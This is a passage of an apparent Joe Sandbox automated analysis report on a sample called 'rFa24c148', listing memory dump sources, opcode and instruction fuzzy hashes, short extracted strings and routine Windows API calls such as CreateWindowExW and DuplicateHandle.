                                                                                              • Instruction Fuzzy Hash: 0B312675B002188FCB04DFA9C480E9DBBB2AF88321F155595E505AF362CB30EC86CFA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 3B3$X&I3
                                                                                              • API String ID: 0-2806618917
                                                                                              • Opcode ID: 2c5d8006e60be8a3bc02fa1d5446bfbc6d835ab10ea9df765770680ac23155d5
                                                                                              • Instruction ID: f802cf2eb0beb759e11c01845628265fdf7320c4dc7030fd128c70daa6f7cb41
                                                                                              • Opcode Fuzzy Hash: 2c5d8006e60be8a3bc02fa1d5446bfbc6d835ab10ea9df765770680ac23155d5
                                                                                              • Instruction Fuzzy Hash: CB2104357055118FC7199B2ADC9452EB7A2FFC97547198079E80ADB7A8CF34DC028B90
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 369246A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996564753.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36920000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: c0713bc94e11c78b990c593f7da4e7ef518e785e7b99b9e0107d450ff34d2b50
                                                                                              • Instruction ID: 4bf9291d2f0208e6f653b8ec68d8d1ce034a8e467b89d5a1b69093dc5f565a96
                                                                                              • Opcode Fuzzy Hash: c0713bc94e11c78b990c593f7da4e7ef518e785e7b99b9e0107d450ff34d2b50
                                                                                              • Instruction Fuzzy Hash: E551D2B1D10309EFDB14CF9AD884ADEBBB5FF88710F60852AE819AB214D7759841CF90
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 369246A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996564753.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36920000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: dd5ff3767854410e85f908cf32353a108be8a1886c659d93372ebcf9426e00dc
                                                                                              • Instruction ID: 78c0278dadf0c2b66f93738b9b5786aaa1a54bafd8c5b45847f110020dd7a01f
                                                                                              • Opcode Fuzzy Hash: dd5ff3767854410e85f908cf32353a108be8a1886c659d93372ebcf9426e00dc
                                                                                              • Instruction Fuzzy Hash: F941D0B1D10309DFDB14CF9AD884ADEBBB5FF88710F60812AE819AB214D7759841CF90
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 36926C11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996564753.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36920000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: 372fbc74f43d555999fa329b00ff1e3214612dd282c57ad86a3d400efd606de5
                                                                                              • Instruction ID: af2364f57f5fc1b507c59f2c3af0962fbdb1b1174342a1c2db6c7000de178c44
                                                                                              • Opcode Fuzzy Hash: 372fbc74f43d555999fa329b00ff1e3214612dd282c57ad86a3d400efd606de5
                                                                                              • Instruction Fuzzy Hash: 4D4129B5900309CFDB14DF99C884A9ABBF5FF88314F248859E519A7325D774A851CFA0
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36839C3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996509899.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36830000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 23b050cb9b51bcc432923aee405184a0d5be4ff5149e25f1c5ba2f75c0e31d6a
                                                                                              • Instruction ID: d71084a5c20f0a9671a9b397b067eeb08442ee7bceb188276a42af1d70a4559e
                                                                                              • Opcode Fuzzy Hash: 23b050cb9b51bcc432923aee405184a0d5be4ff5149e25f1c5ba2f75c0e31d6a
                                                                                              • Instruction Fuzzy Hash: CC2107B59003499FDB10CFAAD984ADEFFF4EB48320F14851AE954A3351D374A941DFA1
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36839C3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996509899.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36830000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 59db1c9b9df4239fdc81cd9f48907bc021964326e2f47f7a3a876b3efc957638
                                                                                              • Instruction ID: 6c1aacf421f649d84a6335428ed7e228eb7ceb2d0f819b937d91d0e743cff24c
                                                                                              • Opcode Fuzzy Hash: 59db1c9b9df4239fdc81cd9f48907bc021964326e2f47f7a3a876b3efc957638
                                                                                              • Instruction Fuzzy Hash: B621E4B5900248AFDB10CFAAD984ADEBFF4EB48320F14841AE958A3310D374A944DFA1
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 369290ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996564753.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36920000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: c7804d984aef2b21a0705a4e1f95922eda82e69074b725f4da7d6724b361bbdc
                                                                                              • Instruction ID: b03fd0c759cd6106be56c6dd0e0b748e7290d11cde5c0b4605a63ee4517d637d
                                                                                              • Opcode Fuzzy Hash: c7804d984aef2b21a0705a4e1f95922eda82e69074b725f4da7d6724b361bbdc
                                                                                              • Instruction Fuzzy Hash: 4E1115B59043488FDB20DF9AD445BDEBFF8EB48320F208459D559A7300D779A944CFA5
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 369290ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996564753.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36920000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: c1b0107d00bf9f6c2b4ce4d437ed102915604227ad299579fe315af63c86d807
                                                                                              • Instruction ID: 939314494029a52a37204c320b832f8dcbfbf84d7ee680353a921017503bdb84
                                                                                              • Opcode Fuzzy Hash: c1b0107d00bf9f6c2b4ce4d437ed102915604227ad299579fe315af63c86d807
                                                                                              • Instruction Fuzzy Hash: EF1112B59003489FCB20DF9AD845B8EFBF8EF48320F20841AD559A7240D379A984CFA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hbq
                                                                                              • API String ID: 0-1245868
                                                                                              • Opcode ID: d9b69f094c1b225f0326a99d6de84e120da238a6639a254a14eb8f7c155382e2
                                                                                              • Instruction ID: 8d6e3beb8667d17854cd52b8e03366a8c477f1e0fb3428424adb446074eb7ee2
                                                                                              • Opcode Fuzzy Hash: d9b69f094c1b225f0326a99d6de84e120da238a6639a254a14eb8f7c155382e2
                                                                                              • Instruction Fuzzy Hash: A531D635B002489FC744EFB9D854A6F7BA6EFC8341F50447EA60AD7291DE349E02CBA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hbq
                                                                                              • API String ID: 0-1245868
                                                                                              • Opcode ID: 76fe83ec57ac04e79aaf4bb90a9fc94b7566696315bb6ac78a460f866c19c238
                                                                                              • Instruction ID: c69bd07114c67240efa76b79c8dfe4b473dfc66c817f3cce0724ea78d614f0eb
                                                                                              • Opcode Fuzzy Hash: 76fe83ec57ac04e79aaf4bb90a9fc94b7566696315bb6ac78a460f866c19c238
                                                                                              • Instruction Fuzzy Hash: 2D212634B002499FD704AB69C814B5E7FB6FFC4351F60847AD606877A1CE359E02CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: F
                                                                                              • API String ID: 0-2730988801
                                                                                              • Opcode ID: f3410f7c06631d23dbc8fb84a8af129c83073223dd17905a454d799ec1bc2fe4
                                                                                              • Instruction ID: 37e58e6916b4e12950640355c44aba196cd5d46c78435cbc1abf41e4bf7d42dd
                                                                                              • Opcode Fuzzy Hash: f3410f7c06631d23dbc8fb84a8af129c83073223dd17905a454d799ec1bc2fe4
                                                                                              • Instruction Fuzzy Hash: 12312774D053498FCB06DFB8D8156EEBFF4EF4A300F1451AAD444A7261EB341A95CBA2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $S3
                                                                                              • API String ID: 0-2423583135
                                                                                              • Opcode ID: cb73ac93fed1877fa6fdfadc349f8e42e98da4b537ccabb198ac9d23e59fc771
                                                                                              • Instruction ID: 8af2ed931ea1ac7cb617a4ba178a42714a26c28efa6578d527076bd688f59784
                                                                                              • Opcode Fuzzy Hash: cb73ac93fed1877fa6fdfadc349f8e42e98da4b537ccabb198ac9d23e59fc771
                                                                                              • Instruction Fuzzy Hash: 3D112974E0020AAFDB41CFA8D841AAEBBB1FB8A300F508469D954A7360D7349A56DB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a65eb96ca0f49571a4f3516bb8cbfcdfa887b2be9f160aaad4ca624f643f1b5a
                                                                                              • Instruction ID: 716c72286201396d22fc5a8ff5f2053f4817d2c6bfa17927644f0cb7e3052c69
                                                                                              • Opcode Fuzzy Hash: a65eb96ca0f49571a4f3516bb8cbfcdfa887b2be9f160aaad4ca624f643f1b5a
                                                                                              • Instruction Fuzzy Hash: 9812A834421653DFE2402B60EEAC12E7BA1FB5F727710AD24F10FC1865AB7546DACB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a77dec9e6f544a13bca09839ef7c7914bc2f3d17610dbcb00315341f99da83d
                                                                                              • Instruction ID: 3c9c608b1bf0a0c46ad631256226edd4a0cf2c38e6816d2bf127d01420f1ae13
                                                                                              • Opcode Fuzzy Hash: 5a77dec9e6f544a13bca09839ef7c7914bc2f3d17610dbcb00315341f99da83d
                                                                                              • Instruction Fuzzy Hash: 3D51F676B002059FDB04AA6AD854A5FB7F9EBC4331F11853BE61AD7750D730D805CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8d8b6e564826ba0fb2a929ef90ffd459e19b16fd346c1be7b3cfb8024f67f904
                                                                                              • Instruction ID: 0bea107e73810bf4fcb8d7da97d01a124a26a1b74aa43fc6d2c92f8196fbabb1
                                                                                              • Opcode Fuzzy Hash: 8d8b6e564826ba0fb2a929ef90ffd459e19b16fd346c1be7b3cfb8024f67f904
                                                                                              • Instruction Fuzzy Hash: C27139347006058FCB19DF68CCA4A6E7BE6AF9A740B1942A9E806DB3B1DF70DC51CB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 077389b1cf5f567e00d93afedeaf37abc97feb72f42c55a4d54ee67a8c577e98
                                                                                              • Instruction ID: ef2af4bf34308e64572286d4a83a54f700fb65c5ca485405670518f8912e898c
                                                                                              • Opcode Fuzzy Hash: 077389b1cf5f567e00d93afedeaf37abc97feb72f42c55a4d54ee67a8c577e98
                                                                                              • Instruction Fuzzy Hash: 7171AF74E012188FEB04DFA9C890AEDBBF2EF89300F608129D409BB355DB359986DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 822f2f99f216f4bb919d602b8a45eb780b9649e048b20053ba8d9df51cb85e7f
                                                                                              • Instruction ID: 43b4378c21297723e32439ed5e8e38b1f1a44fe614b4e826f5851da22f80be85
                                                                                              • Opcode Fuzzy Hash: 822f2f99f216f4bb919d602b8a45eb780b9649e048b20053ba8d9df51cb85e7f
                                                                                              • Instruction Fuzzy Hash: E371BF74E00218CFEB04DFA9C894AEDBBB2EF89301F60812AD409BB354DB359946DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f1ee68f27e8f1fac5f93f9b8e0482f242ea41a7a602c37692761ae7c41e64aa
                                                                                              • Instruction ID: 6999650e96d8b587f0a50370502a5b93b1d7eaeeaa15c256141e9619110a3e88
                                                                                              • Opcode Fuzzy Hash: 3f1ee68f27e8f1fac5f93f9b8e0482f242ea41a7a602c37692761ae7c41e64aa
                                                                                              • Instruction Fuzzy Hash: 8C71BE74E00218CFEB04DFA5C990AAEBBB2EF89300F608129D419BB355DB35A942DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2c49c575e7feef329599f7ea2fd486437b3f3250ec8d0284afd59315e6c54a70
                                                                                              • Instruction ID: 07f58cbefb87d947485af031ae317a80ce5047d053d3cbcd9d81f65ef90971b1
                                                                                              • Opcode Fuzzy Hash: 2c49c575e7feef329599f7ea2fd486437b3f3250ec8d0284afd59315e6c54a70
                                                                                              • Instruction Fuzzy Hash: 5771CF74E10218CFEB04DFA5C990AADBBB2FF89300F608129D419BB354DB359942DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ee173f664586fd116a46719eefb7998bf28c606e1a991be889b47f7e4d4d74da
                                                                                              • Instruction ID: a2dcfc37d73b0a72d1b7593b1578173ecbe9cef5504e599aa200f0d8665f5aca
                                                                                              • Opcode Fuzzy Hash: ee173f664586fd116a46719eefb7998bf28c606e1a991be889b47f7e4d4d74da
                                                                                              • Instruction Fuzzy Hash: A0611274D01218DFDB14CFA9D844BAEBBB2FF88305F208529E809AB354DB355A86CF41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7179a22885ad52c388d4d27ebaa6cd2c173fd38737effae354253550b1b56889
                                                                                              • Instruction ID: bd347a7ebfd1828582ca6667e6a5bfd414f5f0ce6932936f81dad43dcf668615
                                                                                              • Opcode Fuzzy Hash: 7179a22885ad52c388d4d27ebaa6cd2c173fd38737effae354253550b1b56889
                                                                                              • Instruction Fuzzy Hash: DD519674E01208CFDB08DFA9D89499DBBF2FF89310B209069E809BB325DB359942CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3235eed26bdcaf5ba33dac49e210fecf9bab0fa967ed032e768f303250e47db5
                                                                                              • Instruction ID: a8b3e84c6fca4bc9656c548b9d3d546e408befbd7ddd816b4804eeae6bdb35ef
                                                                                              • Opcode Fuzzy Hash: 3235eed26bdcaf5ba33dac49e210fecf9bab0fa967ed032e768f303250e47db5
                                                                                              • Instruction Fuzzy Hash: 3651BF31A04259DFCF15CFA8CC44AAEBFB2BF49310F448155E945AB261D770E924CF62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d534ae546ce0847466d380f56270acf79e686de47819ebd53f9db5f2e749a483
                                                                                              • Instruction ID: 4a715f51fa0ff886c3492c7472eb6d0df2639e87200775cb61be8490bcbf7c2e
                                                                                              • Opcode Fuzzy Hash: d534ae546ce0847466d380f56270acf79e686de47819ebd53f9db5f2e749a483
                                                                                              • Instruction Fuzzy Hash: D851F1B4D01218DBDB04CFAAD8886DDBBB2BF89314F10C52AE415BB294DB749949CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e8a982dd462c60cc9bb3b5c7fe78ee02c978c689e76c49e7acd21843827c2a94
                                                                                              • Instruction ID: 935b5c7cedea0f849b9477b21adeb40bc11433fe1eab238d893094a78c5cae65
                                                                                              • Opcode Fuzzy Hash: e8a982dd462c60cc9bb3b5c7fe78ee02c978c689e76c49e7acd21843827c2a94
                                                                                              • Instruction Fuzzy Hash: 2551E374D01318CFEB10CFA9D4886DCBBB1BF4A314F21952AE516BB290D734988ACF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2413989ac106e5f6d5f5b5e10d91c50638e2bb65f52f055e473fa159b10e1818
                                                                                              • Instruction ID: e73425634849c995a9241726634a1e473267f743ebe24112a48a279c045ba0fb
                                                                                              • Opcode Fuzzy Hash: 2413989ac106e5f6d5f5b5e10d91c50638e2bb65f52f055e473fa159b10e1818
                                                                                              • Instruction Fuzzy Hash: DF41C074E05219DFDB04CFA5C5947EEBBF2EB49300F60812AD415AB394DB345A4ACF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5869628bc21eda8932843ebb10060d356c5a87fd940b9f4dfe26682d7ada7475
                                                                                              • Instruction ID: fbd9956c1543ba75355b432716bd61ff615f3ff52028e7dcfa6d2308543ecaa6
                                                                                              • Opcode Fuzzy Hash: 5869628bc21eda8932843ebb10060d356c5a87fd940b9f4dfe26682d7ada7475
                                                                                              • Instruction Fuzzy Hash: D041B074E05219DFEB04CFA5C5946EDBBF2EB48304F50912AD405A7394EB345A4ACF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5871ec4ae629f4670350d4d4d06ac04356bfcea59a911067e7256b51583ce4ac
                                                                                              • Instruction ID: 183619df9b9d836929de9be92a35c0d693ef543c58233914cbafb32e028db436
                                                                                              • Opcode Fuzzy Hash: 5871ec4ae629f4670350d4d4d06ac04356bfcea59a911067e7256b51583ce4ac
                                                                                              • Instruction Fuzzy Hash: 37411474E002488BEB08CFAAD850AEEBBB2AF89300F50D02AD419BF354DB355946CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 51670066d9869ada3643a8f93ba54ae68d41289189aca916f8ac691940f08a19
                                                                                              • Instruction ID: 4b3d56cbf8cdb0f4c28b0f5e5b9cf61675b7ec6d84d07670897ec0c6a37d4fa3
                                                                                              • Opcode Fuzzy Hash: 51670066d9869ada3643a8f93ba54ae68d41289189aca916f8ac691940f08a19
                                                                                              • Instruction Fuzzy Hash: 1931F574E012488BDB08CFEAD954ADEBBF2AF8A300F64D42AC418BB354DB355906CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd2998a8d3aea0baaaeb7df10b9adba9de402d53f42b3412948ef2d1d99c205e
                                                                                              • Instruction ID: f46b38ef6c31cb0b107de2f546ec192201a72584762a74a24eecf5e6b877b5ee
                                                                                              • Opcode Fuzzy Hash: bd2998a8d3aea0baaaeb7df10b9adba9de402d53f42b3412948ef2d1d99c205e
                                                                                              • Instruction Fuzzy Hash: 00317E31604209DFCF05AFA4DC94AAE3BA2FB88301F508025F91597355CB39DE61DFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aca85822f0eb381e9e7094504c79a61e968c4f22b1def828add4abca76e6b27f
                                                                                              • Instruction ID: 4a4c9af5b1a7da9862fd834d823d12e3ea8bf21b554f9ebc7a4c2b3238f69648
                                                                                              • Opcode Fuzzy Hash: aca85822f0eb381e9e7094504c79a61e968c4f22b1def828add4abca76e6b27f
                                                                                              • Instruction Fuzzy Hash: 1631F875D016088BDB04CFAAC944ADEFBF2AF89300FA4D02AD518BB354DB366912CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1c1679cf4cc6b700a99f352bb0ee95e30ddd3ba65333cd236741cac3353ebf3a
                                                                                              • Instruction ID: 46b95702b90ec1a067965199efc85a43d91667b8322d0288353143a789e76b71
                                                                                              • Opcode Fuzzy Hash: 1c1679cf4cc6b700a99f352bb0ee95e30ddd3ba65333cd236741cac3353ebf3a
                                                                                              • Instruction Fuzzy Hash: 3B314735A101628BEB15C728C89497E7BB2FF40344B958D29E618DF2A1EF30DD4EC792
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ddd00799fbc5d71fca1761182203068c932a553a18768a984ca2b93da0e782bc
                                                                                              • Instruction ID: 6b7aafcc81a7189178f1be45a39423ae197d0cdf0e6917729351e8dfa2bc7752
                                                                                              • Opcode Fuzzy Hash: ddd00799fbc5d71fca1761182203068c932a553a18768a984ca2b93da0e782bc
                                                                                              • Instruction Fuzzy Hash: 7C31C274E012588BEB08DFAAD8446DEBBF2AF8A300F50D13AD419BB254EB345906CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
